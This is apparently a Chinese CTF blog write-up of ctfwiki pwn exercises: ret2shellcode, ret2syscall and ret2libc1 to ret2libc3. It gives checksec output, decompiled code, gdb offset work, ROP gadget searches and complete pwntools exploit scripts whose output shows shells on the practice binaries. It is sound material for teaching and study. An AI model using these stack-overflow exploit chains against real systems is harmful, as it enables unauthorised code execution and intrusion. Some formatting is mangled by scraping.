【ctf题目系列】ctfwiki pwn类型


  • ctf


[root@ningan ret2shellcode]# ./ret2shellcodeNo system for you this time !!!123bye bye ~[root@ningan ret2shellcode]#


[root@ningan ret2shellcode]# checksec ret2shellcode[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)[*] '/root/ctf/ctfwiki/ret2shellcode/ret2shellcode'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX disabledPIE:No PIE (0x8048000)RWX:Has RWX segments

NX disabled = 可以将shellcode放在数据段,即可执行


int __cdecl main(int argc, const char **argv, const char **envp){char s[100]; // [esp+1Ch] [ebp-64h] BYREFsetvbuf(stdout, 0, 2, 0);setvbuf(stdin, 0, 1, 0);puts("No system for you this time !!!");gets(s);strncpy(buf2, s, 0x64u);printf("bye bye ~");return 0;}

栈溢出漏洞,还同时将对应的字符串复制到 buf2 处


.bss:0804A065 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+align 20h.bss:0804A080 public buf2.bss:0804A080 ; char buf2[100].bss:0804A080 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+buf2 db 64h dup(?); DATA XREF: main+7B↑o.bss:0804A080 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+_bss ends.bss:0804A080 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+

图片[1] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


pwndbg> b main...pwndbg> r...pwndbg> vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA StartEnd Perm Size Offset File 0x80480000x8049000 r-xp 10000 /root/ctfwiki/ret2shellcode/ret2shellcode 0x80490000x804a000 r--p 10000 /root/ctfwiki/ret2shellcode/ret2shellcode 0x804a0000x804b000 rw-p 1000 1000 /root/ctfwiki/ret2shellcode/ret2shellcode0xf7c00000 0xf7c22000 r--p220000 /usr/lib/i386-linux-gnu/libc.so.60xf7c22000 0xf7d9b000 r-xp 17900022000 /usr/lib/i386-linux-gnu/libc.so.60xf7d9b000 0xf7e1c000 r--p81000 19b000 /usr/lib/i386-linux-gnu/libc.so.60xf7e1c000 0xf7e1e000 r--p 2000 21b000 /usr/lib/i386-linux-gnu/libc.so.60xf7e1e000 0xf7e1f000 rw-p 1000 21d000 /usr/lib/i386-linux-gnu/libc.so.60xf7e1f000 0xf7e29000 rw-p a0000 [anon_f7e1f]0xf7fc2000 0xf7fc4000 rw-p 20000 [anon_f7fc2]0xf7fc4000 0xf7fc8000 r--p 40000 [vvar]0xf7fc8000 0xf7fca000 r-xp 20000 [vdso]0xf7fca000 0xf7fcb000 r--p 10000 /usr/lib/i386-linux-gnu/ld-linux.so.20xf7fcb000 0xf7fed000 r-xp22000 1000 /usr/lib/i386-linux-gnu/ld-linux.so.20xf7fed000 0xf7ffb000 r--p e00023000 /usr/lib/i386-linux-gnu/ld-linux.so.20xf7ffb000 0xf7ffd000 r--p 200030000 /usr/lib/i386-linux-gnu/ld-linux.so.20xf7ffd000 0xf7ffe000 rw-p 100032000 /usr/lib/i386-linux-gnu/ld-linux.so.20xfffdd000 0xffffe000 rwxp210000 [stack]

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20230830更新 开始
20230830更新 结束

# gdb ret2shellcodepwndbg> b main...pwndbg> run...pwndbg> npwndbg> npwndbg> n...AAAAAAAApwndbg> stack 40pwndbg> distance 源地址 目的地址pwndbg> p/d 0x6c

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默认栈帧 +-----------------+ | retaddr | +-----------------+ | saved ebp |ebp-->+-----------------+ | | | | | | | | | | | |buf--->+-----------------+修改后栈帧 +-----------------+ | (retaddr) | |buf2_addr| +-----------------+ | (saved ebp) | | BBBB|ebp--->+-----------------+ | | | | |shellcode...AAAA | | | | | | |s--->+-----------------+ +-----------------+ | | | | |shellcode...AAAA | | | | | | | buf2--->+-----------------+bss段 


#!/usr/bin/env pythonfrom pwn import *sh = process('./ret2shellcode')shellcode = asm(shellcraft.sh())buf2_addr = 0x804a080 sh.sendline(shellcode.ljust(108+4, b'A') + p32(buf2_addr))sh.interactive()"""[root@ningan ret2shellcode]# python exp.py[+] Starting local process './ret2shellcode': pid 8742[*] Switching to interactive modeNo system for you this time !!!bye bye ~$ lsexp.pyret2shellcode$"""



[root@ningan ret2syscall]# checksec rop[*] '/root/ctf/ctfwiki/ret2syscall/rop'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)[root@ningan ret2syscall]# file roprop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=2bff0285c2706a147e7b150493950de98f182b78, with debug_info, not stripped

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int __cdecl main(int argc, const char **argv, const char **envp){int v4; // [esp+1Ch] [ebp-64h] BYREFsetvbuf(stdout, 0, 2, 0);setvbuf(stdin, 0, 1, 0);puts("This time, no system() and NO SHELLCODE!!!");puts("What do you plan to do" />);gets(&v4);return 0;}

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# gdb roppwndbg> b main...pwndbg> run...pwndbg> npwndbg> npwndbg> n...AAAAAAAApwndbg> stack 40pwndbg> distance 0xffffd2fc 0xffffd3680xffffd2fc->0xffffd368 is 0x6c bytes (0x1b words)pwndbg> p/d 0x6c

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[root@ningan ret2syscall]# ROPgadget --binary rop--only 'pop|ret' | grep 'eax'0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret0x080bb196 : pop eax ; ret0x0807217a : pop eax ; ret 0x80e0x0804f704 : pop eax ; ret 30x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret[root@ningan ret2syscall]#[root@ningan ret2syscall]# ROPgadget --binary rop--only 'pop|ret' | grep 'ebx'0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret0x080be23f : pop ebx ; pop edi ; ret0x0806eb69 : pop ebx ; pop edx ; ret0x08092258 : pop ebx ; pop esi ; pop ebp ; ret0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x100x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x140x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc0x08048547 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 40x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 80x08048913 : pop ebx ; pop esi ; pop edi ; ret0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 40x08049a94 : pop ebx ; pop esi ; ret0x080481c9 : pop ebx ; ret0x080d7d3c : pop ebx ; ret 0x6f90x08099c87 : pop ebx ; ret 80x0806eb91 : pop ecx ; pop ebx ; ret0x0806336b : pop edi ; pop esi ; pop ebx ; ret0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret0x0805c820 : pop esi ; pop ebx ; ret0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret0x0807b6ed : pop ss ; pop ebx ; ret[root@ningan ret2syscall]#[root@ningan ret2syscall]#[root@ningan ret2syscall]#[root@ningan ret2syscall]# ROPgadget --binary rop--string '/bin/sh'Strings information============================================================0x080be408 : /bin/sh[root@ningan ret2syscall]#[root@ningan ret2syscall]#[root@ningan ret2syscall]# ROPgadget --binary rop--only 'int'Gadgets information============================================================0x08049421 : int 0x80Unique gadgets found: 1

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此次,由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell,所以我们利用程序中的 gadgets 来获得 shell,而对应的 shell 获取则是利用系统调用。

简单地说,只要我们把对应获取 shell 的系统调用的参数放到对应的寄存器中,那么我们在执行 int 0x80 就可执行对应的系统调用。比如说这里我们利用如下系统调用来获取 shell


其中,该程序是 32 位,所以我们需要使得

  • 系统调用号,即 eax 应该为 0xb
  • 第一个参数,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。
  • 第二个参数,即 ecx 应该为 0
  • 第三个参数,即 edx 应该为 0
默认栈帧 +-----------------+ | retaddr | +-----------------+ | saved ebp |ebp-->+-----------------+ | | | | | | | | | | | | v4--->+-----------------+修改后栈帧 +-----------------+ |0x80_addr| +-----------------+|/bin/sh_addr | +-----------------+|0| +-----------------+|0| +-----------------+|pop_edx_ecx_ebx_ret_addr | +-----------------+ | 0xb | +-----------------+ |(retaddr)| |pop_eax_ret_addr | +-----------------+ | (saved ebp) | | BBBBB |ebp--->+-----------------+ | | | | | AAA...AAAA| | 108位 | | | | | v4--->+-----------------+


#!/usr/bin/env pythonfrom pwn import *sh = process('./rop')pop_eax_ret = 0x080bb196pop_edx_ecx_ebx_ret = 0x0806eb90int_0x80 = 0x08049421binsh = 0x80be408payload = flat(['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])sh.sendline(payload)sh.interactive()"""[root@ningan ret2syscall]# python exp.py[+] Starting local process './rop': pid 24853[*] Switching to interactive modeThis time, no system() and NO SHELLCODE!!!What do you plan to do" />lsexp.pyrop$"""


ctfwifi官方 ret2shellcode



[root@ningan ret2libc1]# file ret2libc1ret2libc1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fb89c86b266de4ff294489da59959a62f7aa1e61, with debug_info, not stripped[root@ningan ret2libc1]#[root@ningan ret2libc1]# checksec ret2libc1[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)[*] '/root/ctf/ctfwiki/ret2libc1/ret2libc1'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)


int __cdecl main(int argc, const char **argv, const char **envp){char s[100]; // [esp+1Ch] [ebp-64h] BYREFsetvbuf(stdout, 0, 2, 0);setvbuf(_bss_start, 0, 1, 0);puts("RET2LIBC >_<");gets(s);return 0;}


.plt:08048460 ; int system(const char *command)

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这个例子相对来说简单,同时提供了 system 地址与 /bin/sh 的地址

如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以’4位垃圾数据’ 作为虚假的地址,其后参数对应的参数内容。

默认栈帧 +-----------------+ | retaddr | +-----------------+ | saved ebp |ebp-->+-----------------+ | | | | | | | | | | | | v4--->+-----------------+修改后栈帧 +-----------------+|binsh_addr | +-----------------+ |4位垃圾数据 | +-----------------+ |(retaddr)| | system_plt_addr | +-----------------+ | (saved ebp) | |BBBBB|ebp--->+-----------------+ | | | | | AAA...AAAA| | 108位 | | | | | v4--->+-----------------+


#!/usr/bin/env pythonfrom pwn import *sh = process('./ret2libc1')binsh_addr = 0x8048720system_plt = 0x08048460payload = flat(['A' * 108, 'B' * 4, system_plt, 'b' * 4, binsh_addr])sh.sendline(payload)sh.interactive()"""[root@ningan ret2libc1]# python exp.py[+] Starting local process './ret2libc1': pid 738[*] Switching to interactive modeRET2LIBC >_<$ lsexp.pyret2libc1"""



[root@ningan ret2libc2]# file ret2libc2ret2libc2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=83535a471d9ef90c3d5ff7f077944fb6021787a1, with debug_info, not stripped[root@ningan ret2libc2]#[root@ningan ret2libc2]# checksec ret2libc2[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)[*] '/root/ctf/ctfwiki/ret2libc2/ret2libc2'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)


int __cdecl main(int argc, const char **argv, const char **envp){char s[100]; // [esp+1Ch] [ebp-64h] BYREFsetvbuf(stdout, 0, 2, 0);setvbuf(_bss_start, 0, 1, 0);puts("Something surprise here, but I don't think it will work.");printf("What do you think " />);gets(s);return 0;}

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图片[12] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


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gdb ret2libc2b mainrvmmap

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图片[18] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL

[root@ningan ret2libc2]# ROPgadget --binary ret2libc2--only 'pop|ret' | grep 'eax'[root@ningan ret2libc2]#[root@ningan ret2libc2]#[root@ningan ret2libc2]# ROPgadget --binary ret2libc2--only 'pop|ret' | grep 'ebx'0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret0x0804843d : pop ebx ; ret[root@ningan ret2libc2]# ROPgadget --binary ret2libc2--only 'pop|ret' | grep 'ecx'[root@ningan ret2libc2]# ROPgadget --binary ret2libc2--only 'pop|ret' | grep 'edx'



这里就可以调用get函数来让我们输入/bin/sh 然后在让system返回到我们输入的地方


from pwn import *p=process('./ret2libc2')get_add=0x08048460sys_add=0x08048490buf2_add=0x0804A080payload=flat([b'A'*112,get_add,sys_add,buf2_add,buf2_add])p.sendline(payload)p.sendline('/bin/sh')p.interactive()

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##!/usr/bin/env pythonfrom pwn import *sh = process('./ret2libc2')gets_plt = 0x08048460system_plt = 0x08048490pop_ebx = 0x0804843dbuf2 = 0x804a080payload = flat(['a' * 112, gets_plt, pop_ebx, buf2, system_plt, 0xdeadbeef, buf2])sh.sendline(payload)sh.sendline('/bin/sh')sh.interactive()

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图片[21] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


# CTFWIKI-PWN-ret2libc 讲的非常详细



[root@ningan ret2libc3]# file ret2libc3ret2libc3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=c0ad441ebd58b907740c1919460c37bb99bb65df, with debug_info, not stripped[root@ningan ret2libc3]#[root@ningan ret2libc3]# checksec ret2libc3[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)[*] '/root/ctf/ctfwiki/ret2libc3/ret2libc3'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)[root@ningan ret2libc3]# ./ret2libc3No surprise anymore, system disappeard QQ.Can you find it !?1234

图片[22] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL




int __cdecl main(int argc, const char **argv, const char **envp){char s[100]; // [esp+1Ch] [ebp-64h] BYREFsetvbuf(stdout, 0, 2, 0);setvbuf(stdin, 0, 1, 0);puts("No surprise anymore, system disappeard QQ.");printf("Can you find it !" />);gets(s);return 0;}

图片[23] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL




pwndbg> iinfo function putspwndbg> iinfo function system

图片[24] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


ida操作:shift+F12 找到字符串

图片[25] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─# ROPgadget --binary ret2libc3 --string '/bin/sh'Strings information============================================================┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─# ROPgadget --binary ret2libc3 --string 'sh'Strings information============================================================0x08048736 : sh

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.rodata:08048733 ; const char s[].rodata:08048733 6E 6F 5F 73 68 65 6C 6C 5F 51+s db 'no_shell_QQ',0; DATA XREF: secure+3D↑o.rodata:0804873F 00align 10h

图片[27] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL



如何得到 libc 中的某个函数的地址呢?我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。**当然,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。**已经执行过的话就会在got表生存下来,有了真实的地址!

(解法1) 可以泄露puts函数,puts函数已经执行过了。基本利用思路如下:

  • 泄露puts函数地址
  • 获取 libc 版本
  • 获取 system 地址与 /bin/sh 的地址
  • 再次执行源程序
  • 触发栈溢出执行 system(‘/bin/sh’)


# 导入 pwntools 库,这是一个用于二进制漏洞利用的强大工具库。from pwn import *# 导入 LibcSearcher,这是一个用于从函数地址中搜索libc版本和提取libc函数地址的工具。from LibcSearcher import * # 创建一个新的进程,执行名为 ret2libc3 的可执行文件。这将用于在本地系统上执行漏洞利用。io = process("./ret2libc3")# 将 ret2libc3 可执行文件加载到 elf 对象中,以便从中获取有关程序结构的信息,例如函数地址和GOT地址。elf = ELF("./ret2libc3")print("=== 通过泄露 puts 函数的地址 ===")# 获取 puts 函数的 PLT(Procedure Linkage Table)地址和 GOT(Global Offset Table)地址。puts_plt = elf.plt["puts"]puts_got = elf.got["puts"]# 获取程序的 _start 符号的地址,这通常是程序的入口点。start_addr=elf.symbols['_start']print("puts_plt: ", puts_plt)print("hex(puts_plt): ", hex(puts_plt))print("puts_got: ", puts_got)print("hex(puts_got): ", hex(puts_got))print("start_addr: ", start_addr)print("hex(start_addr): ", hex(start_addr))# 构建一个 payload,其中包括 112 个字节的填充(用于填充到返回地址之前),然后是 puts 函数的 PLT 地址、程序入口点地址和 puts 函数的 GOT 地址。这将在程序中触发漏洞。payload1 = flat([b'A'*112,puts_plt,start_addr,puts_got])# payload1 = b'A'*108 + b'BBBB' + puts_plt + start + puts_got# 报错:TypeError: can't concat int to bytes# payload1 = b'A'*108 + b'BBBB' + p32(puts_plt) + p32(start) + p32(puts_got) # 正确写法print("payload1: ", payload1)# 发送构建好的 payload1 到程序。io.sendlineafter('!" />,payload1)# 接收从程序中泄露的 puts 函数的地址,并将其转换为整数。这将帮助确定libc的基址。# io.recv(4)接受程序返回的二进制 大小为4字节u32()为保存为无符号的32位puts_addr_raw = io.recv(4)puts_addr = u32(puts_addr_raw) print("puts_addr_raw: ", puts_addr_raw)print("puts_addr: ", puts_addr)print("hex(puts_addr): ", hex(puts_addr))print("=== 计算libc的基址,然后获取 system 函数地址和 /bin/sh 字符串地址 ===")# 使用 LibcSearcher 工具,根据泄露的 puts 函数地址来搜索libc库并提取相关信息。libc = LibcSearcher('puts',puts_addr)# 计算libc的基址,这是通过从 puts 函数地址中减去 puts 在libc中的偏移得到的。base = puts_addr-libc.dump('puts')# 计算 system 函数和 /bin/sh 字符串的地址,这将用于后续的漏洞利用。system_addr = base+libc.dump('system')bin_addr=base+libc.dump('str_bin_sh')# 构建第二个 payload,其中包括 112 个字节的填充,然后是计算得到的 system 函数地址、随意的返回地址(1234),以及计算得到的 /bin/sh 字符串地址。print("hex(base): ", hex(base))print("hex(system_addr): ", hex(system_addr))print("hex(bin_addr): ", hex(bin_addr))payload2 = flat([b'A'*112,system_addr,1234,bin_addr])# 使用p32函数将整数转换为对应的4字节二进制字符串# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'0xdeadbeaf' + p32(sh_addr) # 错误写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + p32(0xdeadbeaf) + p32(sh_addr) # 正确写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'\x0f\x0b\x0f\x0b' + p32(sh_addr) # 正确写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'1234' + p32(sh_addr) # 正确写法print("payload2: ", payload2)# 发送构建好的 payload2 到程序,触发第二阶段的漏洞利用,旨在获取系统 Shell。io.sendlineafter('!?',payload2)# 与程序进行交互,获取系统 Shell,进入交互式命令模式。io.interactive() """┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─# python exp.py[+] Starting local process './ret2libc3': pid 18449[*] '/root/ctfwiki/ret2libc3/ret2libc3'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)=== 通过泄露 puts 函数的地址 ===puts_plt:134513760hex(puts_plt):0x8048460puts_got:134520856hex(puts_got):0x804a018start_addr:134513872hex(start_addr):0x80484d0payload1:b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\x84\x04\x08\xd0\x84\x04\x08\x18\xa0\x04\x08'/usr/local/lib/python3.11/dist-packages/pwnlib/tubes/tube.py:840: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytesres = self.recvuntil(delim, timeout=timeout)puts_addr_raw:b' 2\xc7\xf7'puts_addr:4157026848hex(puts_addr):0xf7c73220=== 计算libc的基址,然后获取 system 函数地址和 /bin/sh 字符串地址 ===[+] There are multiple libc that meet current constraints :0 - libc6_2.37-5_i3861 - libc6_2.32-0experimental0_amd642 - libc6_2.37-6_i3863 - libc6-amd64_2.32-0experimental0_i3864 - libc6-amd64_2.8~20080505-0ubuntu9_i3865 - libc6_2.32-0experimental1_amd646 - libc6-amd64_2.32-0experimental1_i3867 - libc6_2.8~20080505-0ubuntu9_amd648 - libc6_2.37-7_i386[+] Choose one : 0hex(base):0xf7c00000hex(system_addr):0xf7c4c8a0hex(bin_addr):0xf7db5fc8payload2:b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\xc8\xc4\xf7\xd2\x04\x00\x00\xc8_\xdb\xf7'[*] Switching to interactive mode$ lscoreexp2.pyexp-clean.pyexp.pyret2libc3$"""

图片[28] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL




图片[29] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL

exp-clean exp 删掉了注释

from pwn import *from LibcSearcher import *io = process("./ret2libc3")elf = ELF("./ret2libc3")puts_plt = elf.plt["puts"]puts_got = elf.got["puts"]start = elf.symbols['_start']# payload = b'A'*108 + b'BBBB' + puts_plt + start + puts_got# 报错:TypeError: can't concat int to bytespayload = b'A'*108 + b'BBBB' + p32(puts_plt) + p32(start) + p32(puts_got) # 正确写法io.sendlineafter("Can you find it !" />, payload)puts_addr_raw = io.recv(4)puts_addr = u32(puts_addr_raw)libc = LibcSearcher("puts", puts_addr)base = puts_addr - libc.dump("puts")system_addr = base + libc.dump("system")sh_addr = base + libc.dump("str_bin_sh")# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'0xdeadbeaf' + p32(sh_addr) # 错误写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + p32(0xdeadbeaf) + p32(sh_addr) # 正确写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'\x0f\x0b\x0f\x0b' + p32(sh_addr) # 正确写法payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'1234' + p32(sh_addr) # 正确写法io.sendlineafter("Can you find it !?", payload2)io.interactive()"""┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─# python exp-clean.py[+] Starting local process './ret2libc3': pid 18209[*] '/root/ctfwiki/ret2libc3/ret2libc3'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)/usr/local/lib/python3.11/dist-packages/pwnlib/tubes/tube.py:840: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytesres = self.recvuntil(delim, timeout=timeout)[+] There are multiple libc that meet current constraints :0 - libc6_2.37-5_i3861 - libc6_2.32-0experimental0_amd642 - libc6_2.37-6_i3863 - libc6-amd64_2.32-0experimental0_i3864 - libc6-amd64_2.8~20080505-0ubuntu9_i3865 - libc6_2.32-0experimental1_amd646 - libc6-amd64_2.32-0experimental1_i3867 - libc6_2.8~20080505-0ubuntu9_amd648 - libc6_2.37-7_i386[+] Choose one : 0[*] Switching to interactive mode$ lscoreexp2.pyexp-clean.pyexp.pyret2libc3$ [*] Interrupted[*] Stopped process './ret2libc3' (pid 18209)┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─# ┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─#"""

图片[30] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


# 导入 pwntools 库,这是一个用于二进制漏洞利用的强大工具库。from pwn import *# 导入 LibcSearcher,这是一个用于从函数地址中搜索libc版本和提取libc函数地址的工具。from LibcSearcher import * # 创建一个新的进程,执行名为 ret2libc3 的可执行文件。这将用于在本地系统上执行漏洞利用。io = process("./ret2libc3")# 将 ret2libc3 可执行文件加载到 elf 对象中,以便从中获取有关程序结构的信息,例如函数地址和GOT地址。elf = ELF("./ret2libc3")print("=== 通过泄露 setvbuf 函数的地址 ===")# 获取 puts 函数的 PLT(Procedure Linkage Table)地址和 GOT(Global Offset Table)地址。puts_plt = elf.plt["puts"]setvbuf_got = elf.got["setvbuf"]# 获取程序的 _start 符号的地址,这通常是程序的入口点。start_addr=elf.symbols['_start']print("puts_plt: ", puts_plt)print("hex(puts_plt): ", hex(puts_plt))print("setvbuf_got: ", setvbuf_got)print("hex(setvbuf_got): ", hex(setvbuf_got))print("start_addr: ", start_addr)print("hex(start_addr): ", hex(start_addr))# 构建一个 payload,其中包括 112 个字节的填充(用于填充到返回地址之前),然后是 puts 函数的 PLT 地址、程序入口点地址和 setvbuf 函数的 GOT 地址。这将在程序中触发漏洞。payload1 = flat([b'A'*112,puts_plt,start_addr,setvbuf_got])# payload1 = b'A'*108 + b'BBBB' + puts_plt + start + setvbuf_got# 报错:TypeError: can't concat int to bytes# payload1 = b'A'*108 + b'BBBB' + p32(puts_plt) + p32(start) + p32(setvbuf_got) # 正确写法print("payload1: ", payload1)# 发送构建好的 payload1 到程序。io.sendlineafter('!" />,payload1)# 接收从程序中泄露的 puts 函数的地址,并将其转换为整数。这将帮助确定libc的基址。# io.recv(4)接受程序返回的二进制 大小为4字节u32()为保存为无符号的32位setvbuf_addr_raw = io.recv(4)setvbuf_addr = u32(setvbuf_addr_raw) print("setvbuf_addr_raw: ", setvbuf_addr_raw)print("setvbuf_addr: ", setvbuf_addr)print("hex(setvbuf_addr): ", hex(setvbuf_addr))print("=== 计算libc的基址,然后获取 system 函数地址和 /bin/sh 字符串地址 ===")# 使用 LibcSearcher 工具,根据泄露的 puts 函数地址来搜索libc库并提取相关信息。libc = LibcSearcher('setvbuf',setvbuf_addr)# 计算libc的基址,这是通过从 puts 函数地址中减去 puts 在libc中的偏移得到的。base = setvbuf_addr-libc.dump('setvbuf')# 计算 system 函数和 /bin/sh 字符串的地址,这将用于后续的漏洞利用。system_addr = base+libc.dump('system')bin_addr=base+libc.dump('str_bin_sh')# 构建第二个 payload,其中包括 112 个字节的填充,然后是计算得到的 system 函数地址、随意的返回地址(1234),以及计算得到的 /bin/sh 字符串地址。print("hex(base): ", hex(base))print("hex(system_addr): ", hex(system_addr))print("hex(bin_addr): ", hex(bin_addr))payload2 = flat([b'A'*112,system_addr,1234,bin_addr])# 使用p32函数将整数转换为对应的4字节二进制字符串# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'0xdeadbeaf' + p32(sh_addr) # 错误写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + p32(0xdeadbeaf) + p32(sh_addr) # 正确写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'\x0f\x0b\x0f\x0b' + p32(sh_addr) # 正确写法# payload2 = b'A'*108 + b'BBBB' + p32(system_addr) + b'1234' + p32(sh_addr) # 正确写法print("payload2: ", payload2)# 发送构建好的 payload2 到程序,触发第二阶段的漏洞利用,旨在获取系统 Shell。io.sendlineafter('!?',payload2)# 与程序进行交互,获取系统 Shell,进入交互式命令模式。io.interactive()"""┌──(root㉿kali)-[~/ctfwiki/ret2libc3]└─# python exp2.py[+] Starting local process './ret2libc3': pid 21841[*] '/root/ctfwiki/ret2libc3/ret2libc3'Arch: i386-32-littleRELRO:Partial RELROStack:No canary foundNX: NX enabledPIE:No PIE (0x8048000)=== 通过泄露 setvbuf 函数的地址 ===puts_plt:134513760hex(puts_plt):0x8048460setvbuf_got:134520872hex(setvbuf_got):0x804a028start_addr:134513872hex(start_addr):0x80484d0payload1:b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\x84\x04\x08\xd0\x84\x04\x08(\xa0\x04\x08'/usr/local/lib/python3.11/dist-packages/pwnlib/tubes/tube.py:840: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytesres = self.recvuntil(delim, timeout=timeout)setvbuf_addr_raw:b'\x80:\xc7\xf7'setvbuf_addr:4157028992hex(setvbuf_addr):0xf7c73a80=== 计算libc的基址,然后获取 system 函数地址和 /bin/sh 字符串地址 ===[+] There are multiple libc that meet current constraints :0 - libc6-amd64_2.31-0ubuntu9.4_i3861 - libc6_2.3.2.ds1-13ubuntu2.3_amd642 - libc6_2.37-5_i3863 - libc-2.33.9000-40.fc35.i6864 - libc6_2.11.1-0ubuntu7.14_i3865 - libc-2.33.9000-42.fc35.i6866 - libc6-amd64_2.31-0ubuntu9.5_i3867 - libc6_2.3.2.ds1-13ubuntu2.2_amd648 - libc6_2.37-6_i3869 - libc-2.33.9000-43.fc35.i686[+] Choose one : 2hex(base):0xf7c00000hex(system_addr):0xf7c4c8a0hex(bin_addr):0xf7db5fc8payload2:b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\xc8\xc4\xf7\xd2\x04\x00\x00\xc8_\xdb\xf7'[*] Switching to interactive mode$ lscoreexp2.pyexp33.pyexp-clean.pyexp.pyret2libc3$"""

图片[31] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL


图片[32] - 【ctf题目系列】ctfwiki pwn类型 - MaxSSL



